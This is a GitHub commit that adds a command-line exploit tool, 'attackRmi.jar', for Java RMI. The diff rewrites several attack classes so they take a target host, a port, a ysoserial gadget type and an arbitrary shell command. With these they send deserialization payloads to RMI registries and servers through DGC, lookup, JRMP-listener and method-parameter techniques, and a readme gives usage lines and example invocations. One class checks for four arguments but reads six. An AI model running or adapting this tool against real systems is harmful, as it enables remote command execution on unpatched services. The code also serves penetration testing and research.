add attackRmi.jar

waderwu · Oct 14, 2020 · 1d1b64e · 1d1b64e
1 parent 98df9d3
commit 1d1b64e
Show file tree

Hide file tree

Showing 10 changed files with 294 additions and 31 deletions.
diff --git a/.gitignore b/.gitignore
@@ -18,6 +18,7 @@
 *.zip
 *.tar.gz
 *.rar
+*.iml
 
 # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
 hs_err_pid*

diff --git a/readme.md b/readme.md
@@ -57,7 +57,43 @@ condition:
 
 https://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/033462472c28
 
+## Usage
+```
+ByDGC OR ByLookup
+Usage: java -jar attackRmi.jar DOL [registryHost] [registryPort] '[command]'
+
+ByLookupAndUnicastRef OR ByLookupAndUnicastRefRemoteObject
+Usage: java -jar attackRmi.jar LAU [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
+Usage: java -jar attackRmi.jar LAUS [registryHost] [registryPort] [serverIp] [startPort] '[command]' (run at server)
+
+ByNonPrimitiveParameter
+Usage: java -jar attackRmi.jar NPP [registryHost] [registryPort] [name] '[methodSignature]' '[command]'
+
+AttackRegistryByDGC
+Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByDGC [registryHost] [registryPort] [payload] '[command]'
+
+AttackRegistryByLookup
+Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookup [registryHost] [registryPort] [payload] '[command]'
+
+AttackRegistryByLookupAndUnicastRef
+Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRef [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
+
+AttackRegistryByLookupAndUnicastRefRemoteObject
+Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRefRemoteObject [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]
+
+AttackServerByNonPrimitiveParameter
+Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackServerByNonPrimitiveParameter [registryHost] [registryPort] [name] '[methodSignature]' [payloadType] '[command]'
+```
+example
+- `java -jar attackRmi.jar DOL 127.0.0.1 1099 'open /System/Applications/Calculator.app'`
+- `java -jar attackRmi.jar LAUS 127.0.0.1 1099 127.0.0.1 10000 'open /System/Applications/Calculator.app'`
+- `java -jar attackRmi.jar LAU 127.0.0.1 1099 127.0.0.1 10000`
+- `java -jar attackRmi.jar NPP 127.0.0.1 1099 hello 'sayHello(Ljava/lang/String;)Ljava/lang/String;' 'open /System/Applications/Calculator.app'`
+
+For method signature, you can refer to https://stackoverflow.com/questions/8066253/compute-a-java-functions-signature
+
 ## TODO
 
-- [ ] attackRMI.jar
-- [ ] brute force gadget
+- [x] attackRMI.jar
+- [x] brute force gadget
+- [ ] brute method
diff --git a/src/META-INF/MANIFEST.MF b/src/META-INF/MANIFEST.MF
@@ -0,0 +1,3 @@
+Manifest-Version: 1.0
+Main-Class: com.wu.attackRmi.Main
+
diff --git a/src/com/wu/attackRmi/Exploit/Attack.java b/src/com/wu/attackRmi/Exploit/Attack.java
@@ -0,0 +1,7 @@
+package com.wu.attackRmi.Exploit;
+
+public class Attack {
+    public static void main(String[] args) {
+
+    }
+}
diff --git a/src/com/wu/attackRmi/Exploit/AttackRegistryByDGC.java b/src/com/wu/attackRmi/Exploit/AttackRegistryByDGC.java
@@ -1,17 +1,41 @@
 package com.wu.attackRmi.Exploit;
 
 import com.wu.attackRmi.utils.Stub;
-import ysoserial.payloads.CommonsCollections5;
+import ysoserial.payloads.ObjectPayload;
 
 import java.rmi.server.ObjID;
 
 
 public class AttackRegistryByDGC {
+
     public static void main(String[] args) throws Exception{
-        String host = "127.0.0.1";
-        int port = 1099;
-        Object payloadObject = new CommonsCollections5().getObject("open /System/Applications/Calculator.app");
+        if (args.length != 4) {
+            printUsage();
+            System.exit(64);
+        }
+
+        final String registryHost = args[0];
+        final int registryPort = Integer.parseInt(args[1]);
+        final String payloadType = args[2];
+        final String command = args[3];
+
+        System.out.println("Attacking: "+ registryHost + ":" + registryPort);
+        System.out.println("Payload: "+ payloadType);
+        System.out.println("command: "+ command);
+
+        final Class payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+        final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
+        final Object payloadObject = payload.getObject(command);
+        attack(registryHost, registryPort, payloadObject);
+    }
+
+    public static void attack(String registryHost, int registryPort, Object payloadObject) throws Exception{
         ObjID objID = new ObjID(2);
-        Stub.exploit(host, port, payloadObject, objID, 0, -669196253586618813L);
+        Stub.exploit(registryHost, registryPort, payloadObject, objID, 0, -669196253586618813L);
+    }
+
+    private static void printUsage() {
+        System.err.println("AttackRegistryByDGC");
+        System.err.println("Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByDGC [registryHost] [registryPort] [payload] '[command]'");
     }
 }
diff --git a/src/com/wu/attackRmi/Exploit/AttackRegistryByLookup.java b/src/com/wu/attackRmi/Exploit/AttackRegistryByLookup.java
@@ -1,16 +1,39 @@
 package com.wu.attackRmi.Exploit;
 
 import com.wu.attackRmi.utils.Stub;
-import ysoserial.payloads.CommonsCollections5;
+import ysoserial.payloads.ObjectPayload;
 
 import java.rmi.server.ObjID;
 
 public class AttackRegistryByLookup {
     public static void main(String[] args) throws Exception{
-        String host = "127.0.0.1";
-        int port = 1099;
-        Object payloadObject = new CommonsCollections5().getObject("open /System/Applications/Calculator.app");
+        if (args.length != 4) {
+            printUsage();
+            System.exit(64);
+        }
+
+        final String registryHost = args[0];
+        final int registryPort = Integer.parseInt(args[1]);
+        final String payloadType = args[2];
+        final String command = args[3];
+
+        System.out.println("Attacking: "+ registryHost + ":" + registryPort);
+        System.out.println("Payload: "+ payloadType);
+        System.out.println("command: "+ command);
+
+        final Class payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+        final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
+        final Object payloadObject = payload.getObject(command);
+        attack(registryHost, registryPort, payloadObject);
+    }
+
+    public static void attack(String registryHost, int registryPort, Object payloadObject) throws Exception{
         ObjID objID = new ObjID(0);
-        Stub.exploit(host, port, payloadObject, objID, 2, 4905912898345647071L);
+        Stub.exploit(registryHost, registryPort, payloadObject, objID, 2, 4905912898345647071L);
+    }
+
+    private static void printUsage() {
+        System.err.println("AttackRegistryByLookup");
+        System.err.println("Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookup [registryHost] [registryPort] [payload] '[command]'");
     }
 }
diff --git a/src/com/wu/attackRmi/Exploit/AttackRegistryByLookupAndUnicastRef.java b/src/com/wu/attackRmi/Exploit/AttackRegistryByLookupAndUnicastRef.java
@@ -10,10 +10,18 @@
 
 public class AttackRegistryByLookupAndUnicastRef {
     public static void main(String[] args) throws Exception{
-        String registryHost = "127.0.0.1";
-        int registryPort = 1099;
-        String JRMPListenHost = "127.0.0.1";
-        int JRMPListenPort = 3099;
+        if (args.length != 4) {
+            printUsage();
+            System.exit(64);
+        }
+
+        final String registryHost = args[0];
+        final int registryPort = Integer.parseInt(args[1]);
+        final String JRMPListenHost = args[2];
+        final int JRMPListenPort = Integer.parseInt(args[3]);
+
+        System.out.println("Attacking: "+ registryHost + ":" + registryPort);
+        System.out.println("JRMPServer: "+ JRMPListenHost + ":" + JRMPListenPort);
 
         attack(registryHost, registryPort, JRMPListenHost, JRMPListenPort);
     }
@@ -25,4 +33,9 @@ public static void attack(String registryHost, int registryPort, String JRMPList
         ObjID objID = new ObjID(0);
         Stub.exploit(registryHost, registryPort, ref, objID, 2, 4905912898345647071L);
     }
+
+    private static void printUsage() {
+        System.err.println("AttackRegistryByLookupAndUnicastRef");
+        System.err.println("Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRef [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]");
+    }
 }
diff --git a/src/com/wu/attackRmi/Exploit/AttackRegistryByLookupAndUnicastRefRemoteObject.java b/src/com/wu/attackRmi/Exploit/AttackRegistryByLookupAndUnicastRefRemoteObject.java
@@ -19,11 +19,18 @@
 public class AttackRegistryByLookupAndUnicastRefRemoteObject {
     public static void main(String[] args) throws Exception {
 
-        String JRMPListenHost = "127.0.0.1";
-        int JRMPListenPort = 3099;
+        if (args.length != 4) {
+            printUsage();
+            System.exit(64);
+        }
 
-        String registryHost = "127.0.0.1";
-        int registryPort = 1099;
+        final String registryHost = args[0];
+        final int registryPort = Integer.parseInt(args[1]);
+        final String JRMPListenHost = args[2];
+        final int JRMPListenPort = Integer.parseInt(args[3]);
+
+        System.out.println("Attacking: "+ registryHost + ":" + registryPort);
+        System.out.println("JRMPServer: "+ JRMPListenHost + ":" + JRMPListenPort);
 
         attack(registryHost, registryPort, JRMPListenHost, JRMPListenPort);
     }
@@ -48,4 +55,9 @@ public static void attack(String registryHost, int registryPort, String JRMPList
         ObjID objID = new ObjID(0);
         Stub.exploit(registryHost, registryPort, myRemoteObject, objID, 2, 4905912898345647071L);
     }
+
+    private static void printUsage() {
+        System.err.println("AttackRegistryByLookupAndUnicastRefRemoteObject");
+        System.err.println("Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackRegistryByLookupAndUnicastRefRemoteObject [registryHost] [registryPort] [JRMPListenHost] [JRMPListenPort]");
+    }
 }
diff --git a/src/com/wu/attackRmi/Exploit/AttackServerByNonPrimitiveParameter.java b/src/com/wu/attackRmi/Exploit/AttackServerByNonPrimitiveParameter.java
@@ -1,24 +1,36 @@
 package com.wu.attackRmi.Exploit;
 
 import com.wu.attackRmi.utils.KMPMatch;
-import ysoserial.payloads.CommonsCollections5;
 import com.wu.attackRmi.utils.Stub;
 import com.wu.attackRmi.utils.ComputeMethodHash;
+import ysoserial.payloads.ObjectPayload;
 
 import java.io.ByteArrayInputStream;
 import java.io.ObjectInputStream;
 import java.rmi.server.ObjID;
 
 public class AttackServerByNonPrimitiveParameter {
     public static void main(String[] args) throws Exception {
-        String registryHost  = "127.0.0.1";
-        int registryPort = 1099;
-//        String name = "hello";
-//        String methodSignature = "sayHello(Ljava/lang/String;)Ljava/lang/String;";
-        String name = "two";
-        String methodSignature = "helloman(Ljava/util/HashMap;)I";
-        String cmd = "open /System/Applications/Calculator.app";
-        Object payloadObject = new CommonsCollections5().getObject(cmd);
+        if (args.length != 4) {
+            printUsage();
+            System.exit(64);
+        }
+
+        final String registryHost = args[0];
+        final int registryPort = Integer.parseInt(args[1]);
+        final String name = args[2];
+        final String methodSignature = args[3]; //sayHello(Ljava/lang/String;)Ljava/lang/String;
+        final String payloadType = args[4];
+        final String command = args[5];
+
+        System.out.println("Attacking: "+ registryHost + ":" + registryPort);
+        System.out.println("Method: "+ methodSignature);
+        System.out.println("Payload: "+ payloadType);
+        System.out.println("command: "+ command);
+
+        final Class payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType);
+        final ObjectPayload payload = (ObjectPayload) payloadClass.newInstance();
+        final Object payloadObject = payload.getObject(command);
 
         attack(registryHost, registryPort, name, methodSignature, payloadObject);
     }
@@ -45,4 +57,9 @@ public static void attack(String registryHost, int registryPort, String lookupNa
         long hash = ComputeMethodHash.computeMethodHash(methodSignature);
         Stub.exploit(tcp_host, tcp_port, payloadObject, objID,-1, hash);
     }
+
+    private static void printUsage() {
+        System.err.println("AttackServerByNonPrimitiveParameter");
+        System.err.println("Usage: java -cp attackRmi.jar com.wu.attackRmi.Exploit.AttackServerByNonPrimitiveParameter [registryHost] [registryPort] [name] [methodSignature] [payloadType] [command]");
+    }
 }